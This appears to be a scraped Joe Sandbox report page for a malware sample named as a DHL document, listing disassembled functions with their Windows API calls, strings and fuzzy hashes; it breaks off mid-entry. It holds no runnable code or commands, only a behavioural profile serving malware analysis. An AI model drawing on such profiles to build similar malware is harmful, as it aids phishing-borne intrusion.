Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: d6d254839f08468731b455938ea9b283894f1ef4a942cd5d4ff1a34777b4e487
Instruction ID: 76f6e494d06290726321cb2770bb6f8ec1d75b24a40c26ea5e86f7851527672b
Opcode Fuzzy Hash: d6d254839f08468731b455938ea9b283894f1ef4a942cd5d4ff1a34777b4e487
Instruction Fuzzy Hash: 5C2149312152017BEB196F39BC09EBB7BDCDF65710F10803EF809CA192EB60CC5182A0

Function 0022581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B3A97,?,?,001B2E7F,?,?,?,00000000), ref: 001B3AC2

_wcslen.LIBCMT ref: 0022587B
CoInitialize.OLE32(00000000), ref: 00225995
CoCreateInstance.OLE32(0024FCF8,00000000,00000001,0024FB68,?), ref: 002259AE
CoUninitialize.OLE32 ref: 002259CC

Strings

.lnk, xrefs: 00225876, 002258C1, 00225985

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: cdc05b6897b5a84adfefca8f4ddb9740218bce34f94605b82ba96c54f454414c
Instruction ID: fd8a8f52b3440fb93d9035f01a7bbabf0587b23b5aea4780f42cc9a5e4f216c6
Opcode Fuzzy Hash: cdc05b6897b5a84adfefca8f4ddb9740218bce34f94605b82ba96c54f454414c
Instruction Fuzzy Hash: 2DD18370618721AFC714DF64D484A6ABBE1FF99314F10885DF88A9B361DB31EC45CB92

Function 0021175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00210FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00210FCA
Part of subcall function 00210FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00210FD6
Part of subcall function 00210FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00210FE5
Part of subcall function 00210FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00210FEC
Part of subcall function 00210FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00211002

GetLengthSid.ADVAPI32(?,00000000,00211335), ref: 002117AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002117BA
HeapAlloc.KERNEL32(00000000), ref: 002117C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002117DA
GetProcessHeap.KERNEL32(00000000,00000000,00211335), ref: 002117EE
HeapFree.KERNEL32(00000000), ref: 002117F5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ff697e3ca77e4dcd10adb40bb88f81f1b1243507de484efef6417fef4a56bd15
Instruction ID: b02d07c674b5135422eaad00e64df2d5502bd45dd6c02bff9b689e5661329fd2
Opcode Fuzzy Hash: ff697e3ca77e4dcd10adb40bb88f81f1b1243507de484efef6417fef4a56bd15
Instruction Fuzzy Hash: FB11EE35522606FFDB109FA8DC49BEEBBE8EB52315F204028F5459B290C731A9A1CB60

Function 002114CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002114FF
OpenProcessToken.ADVAPI32(00000000), ref: 00211506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00211515
CloseHandle.KERNEL32(00000004), ref: 00211520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00211563

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: fb08d52156ae2a494df20dd66dea439077d77422ed3dfab76b8ac3785a9e546f
Instruction ID: 003ccc43e8bf77d83f92c99ef560b753796e438788c9f458d4925a58d2234c93
Opcode Fuzzy Hash: fb08d52156ae2a494df20dd66dea439077d77422ed3dfab76b8ac3785a9e546f
Instruction Fuzzy Hash: 6511597660220AABDF119F98ED49BDE7BA9EF49B04F144014FA05A2060C3758EA0DB60

Function 001D3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001D3379,001D2FE5), ref: 001D3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001D339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001D33B7
SetLastError.KERNEL32(00000000,?,001D3379,001D2FE5), ref: 001D3409

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36b97c0bec0088997f36af85f0fcbf3ec84368c172275802540c6e2b7f268509
Instruction ID: fd92bf0e0fe0f376183485a6d912cad9fd383cedc644114c14274c1dfd79ec4e
Opcode Fuzzy Hash: 36b97c0bec0088997f36af85f0fcbf3ec84368c172275802540c6e2b7f268509
Instruction Fuzzy Hash: 8E014733209321BFAA292BB97C895272A94FB25379330022FF430803F0EF218E019186

Function 001E2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001E5686,001F3CD6,?,00000000,?,001E5B6A,?,?,?,?,?,001DE6D1,?,00278A48), ref: 001E2D78
_free.LIBCMT ref: 001E2DAB
_free.LIBCMT ref: 001E2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,001DE6D1,?,00278A48,00000010,001B4F4A,?,?,00000000,001F3CD6), ref: 001E2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,001DE6D1,?,00278A48,00000010,001B4F4A,?,?,00000000,001F3CD6), ref: 001E2DEC
_abort.LIBCMT ref: 001E2DF2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8411905fa15759d8189aa505b38d1a45a64df855fb22a0b5ef4f630669e7c4c6
Instruction ID: e7d12a921ced41967c90f203bd4a09aa738645868558f8f3c4b373cb25d0372d
Opcode Fuzzy Hash: 8411905fa15759d8189aa505b38d1a45a64df855fb22a0b5ef4f630669e7c4c6
Instruction Fuzzy Hash: FCF02D35505D8027C25637BB7C2EE1E165DBFD27A4F354028F629D31D2EF3488014120

Function 00248A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001C9693
Part of subcall function 001C9639: SelectObject.GDI32(?,00000000), ref: 001C96A2
Part of subcall function 001C9639: BeginPath.GDI32(?), ref: 001C96B9
Part of subcall function 001C9639: SelectObject.GDI32(?,00000000), ref: 001C96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00248A4E
LineTo.GDI32(?,00000003,00000000), ref: 00248A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00248A70
LineTo.GDI32(?,00000000,00000003), ref: 00248A80
EndPath.GDI32(?), ref: 00248A90
StrokePath.GDI32(?), ref: 00248AA0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 9e7c0af503ed4558ccf462b55f4a9fc81f0a836be042d8de4fe81d3c1998dc51
Instruction ID: 70b34d3b688d63a59165080b8d25de603c5ab0ad3defcf5d63ada91d91e89531
Opcode Fuzzy Hash: 9e7c0af503ed4558ccf462b55f4a9fc81f0a836be042d8de4fe81d3c1998dc51
Instruction Fuzzy Hash: 3D11097A001159FFDB129F94EC88EAA7F6CEB09350F148012FA199A1A1C7719D65DBA0

Function 002151FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00215218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00215229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00215230
ReleaseDC.USER32(00000000,00000000), ref: 00215238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0021524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00215261

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: a8319687082e52f593faf51cdbfb2aad60612efee3313aba4c3eb7f15525e54d
Instruction ID: d690895251d068554ea4edc9a6a088edb44703a545067fa094f5296702ea860c
Opcode Fuzzy Hash: a8319687082e52f593faf51cdbfb2aad60612efee3313aba4c3eb7f15525e54d
Instruction Fuzzy Hash: 0A018F75A01719BBEB109FA99C49A4EBFB8EB89351F144065FE08A7291D6709C10CFA0

Function 001B1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001B1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001B1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001B1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001B1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001B1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001B1C22

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5c7c12a4234de8f87ae09045b017078f02e947e530ddf276ce95ee9da8048cf5
Instruction ID: 386572366797130e2ada894bc9a7107854f0fbf59b095bea6f424ecbaf4d79b0
Opcode Fuzzy Hash: 5c7c12a4234de8f87ae09045b017078f02e947e530ddf276ce95ee9da8048cf5
Instruction Fuzzy Hash: 120167B0902B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CFE5

Function 0021EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0021EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0021EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0021EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0021EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0021EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0021EB75

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 83f8bb6c1ef1b2c019ebc8e61e9faa521029f5ff26deb801a50f0b43a3a2576e
Instruction ID: b8dd0ff62fc04eb7728950c06fcf76fa5212fa5769377f67a01a3d2691a903c0
Opcode Fuzzy Hash: 83f8bb6c1ef1b2c019ebc8e61e9faa521029f5ff26deb801a50f0b43a3a2576e
Instruction Fuzzy Hash: 02F09ABA202158BBE7205B66AC0EEEF3E7CEFCBF11F104158FA01D1090D7A01A01C6B4

Function 00207439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00207452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00207469
GetWindowDC.USER32(?), ref: 00207475
GetPixel.GDI32(00000000,?,?), ref: 00207484
ReleaseDC.USER32(?,00000000), ref: 00207496
GetSysColor.USER32(00000005), ref: 002074B0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: c0bc03edd1fb736c0cb61ce4792940c158f8ca21c867b01d64f9cb66e7e218fb
Instruction ID: c4b6e59c6f4f533afe0475d51210b8d13f85994a461cd84e85031ddd9d49caa6
Opcode Fuzzy Hash: c0bc03edd1fb736c0cb61ce4792940c158f8ca21c867b01d64f9cb66e7e218fb
Instruction Fuzzy Hash: F9014B35811215EFDB915F68EC0CBAE7BB9FB05311F614164F915A21E2CB312E51AB50

Function 00211874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0021187F
UnloadUserProfile.USERENV(?,?), ref: 0021188B
CloseHandle.KERNEL32(?), ref: 00211894
CloseHandle.KERNEL32(?), ref: 0021189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002118A5
HeapFree.KERNEL32(00000000), ref: 002118AC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 74ee2759457433044612de62307b5b4841864c8184529134c925b61b85892a97
Instruction ID: a91b97487984a05ceb0f1ad31513717014b5c4686b16f2db27057e573c997ce3
Opcode Fuzzy Hash: 74ee2759457433044612de62307b5b4841864c8184529134c925b61b85892a97
Instruction Fuzzy Hash: 20E0E53A206501BBDB416FA9FD0C90ABF39FF4AB22B208220F22981070CB329420DF50

Function 001BBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001BBEB3

Strings

D%(, xrefs: 001BBE9A
D%(, xrefs: 001BBDED, 001BBD91, 001BBD1B
D%(D%(, xrefs: 001BBCA5
D%(, xrefs: 001BBCA2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%($D%($D%($D%(D%(
API String ID: 1385522511-2826432073
Opcode ID: d3ee799876aff52c3f687f17aadd13af5399f430c044a5f676da5bc54b5112cd
Instruction ID: dc6545fd7101b64a7e5b7646d02a2692eda5570ab9fc07475945931f28ef4132
Opcode Fuzzy Hash: d3ee799876aff52c3f687f17aadd13af5399f430c044a5f676da5bc54b5112cd
Instruction Fuzzy Hash: 08915975A0820ACFCB18CF99C0D06EABBF1FF58314F64816AD945AB750D7B5E981CB90

Function 00237B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 001D0242: EnterCriticalSection.KERNEL32(0028070C,00281884,?,?,001C198B,00282518,?,?,?,001B12F9,00000000), ref: 001D024D
Part of subcall function 001D0242: LeaveCriticalSection.KERNEL32(0028070C,?,001C198B,00282518,?,?,?,001B12F9,00000000), ref: 001D028A

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 001D00A3: __onexit.LIBCMT ref: 001D00A9

__Init_thread_footer.LIBCMT ref: 00237BFB

Part of subcall function 001D01F8: EnterCriticalSection.KERNEL32(0028070C,?,?,001C8747,00282514), ref: 001D0202
Part of subcall function 001D01F8: LeaveCriticalSection.KERNEL32(0028070C,?,001C8747,00282514), ref: 001D0235

Strings

Variable must be of type 'Object'., xrefs: 00237C3A
5, xrefs: 00237C78
+T , xrefs: 00237E2E
G, xrefs: 00237C7F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T $5$G$Variable must be of type 'Object'.
API String ID: 535116098-4255551972
Opcode ID: b5591134a8e8d2df6a6103a265beb737039a4a8a3a20367d312b72a9b229fc5e
Instruction ID: 8d5cce7e34387add40b91ad6e63fa278ef3bc2e2aafe26cd2767739e8781f0d5
Opcode Fuzzy Hash: b5591134a8e8d2df6a6103a265beb737039a4a8a3a20367d312b72a9b229fc5e
Instruction Fuzzy Hash: 52918DB4A24209EFCF24EF94D891DADB7B1FF49300F508059F8069B292DB71AE65CB51

Function 0021C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7620: _wcslen.LIBCMT ref: 001B7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0021C6EE
_wcslen.LIBCMT ref: 0021C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0021C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0021C7CA

Strings

0, xrefs: 0021C6AF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: abeb3a0787409af6489f5c64f7c64d7c688d3c4e612eab2644176ccfbf2739f6
Instruction ID: be7275d54b28b62c908e7311b9b73ed39b6951e5f59329d9b23c6d7c99c97119
Opcode Fuzzy Hash: abeb3a0787409af6489f5c64f7c64d7c688d3c4e612eab2644176ccfbf2739f6
Instruction Fuzzy Hash: D85104796A43429BD3109F28C885BFBB7ECAFA5310F24092DF591D21D0D7B0C8A5CB52

Function 0023AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0023AEA3

Part of subcall function 001B7620: _wcslen.LIBCMT ref: 001B7625

GetProcessId.KERNEL32(00000000), ref: 0023AF38
CloseHandle.KERNEL32(00000000), ref: 0023AF67

Strings

@, xrefs: 0023AE72
<, xrefs: 0023AE6B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 909348f7cd38886278e58ceb4513fdca9f4755900f9858fa3474041f84b64886
Instruction ID: 82d97616ed8071b0cf471b94b961342874a68d330dc709b6ebc64b9e4fac96d1
Opcode Fuzzy Hash: 909348f7cd38886278e58ceb4513fdca9f4755900f9858fa3474041f84b64886
Instruction Fuzzy Hash: CC71ACB4A00219DFCB14DF58D485A9EBBF0FF18314F0484A9E856AB7A2CB75ED41CB91

Function 00246278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00EFE440,?), ref: 002462E2
ScreenToClient.USER32(?,?), ref: 00246315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00246382

Strings

8], xrefs: 002462B1, 002463AC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
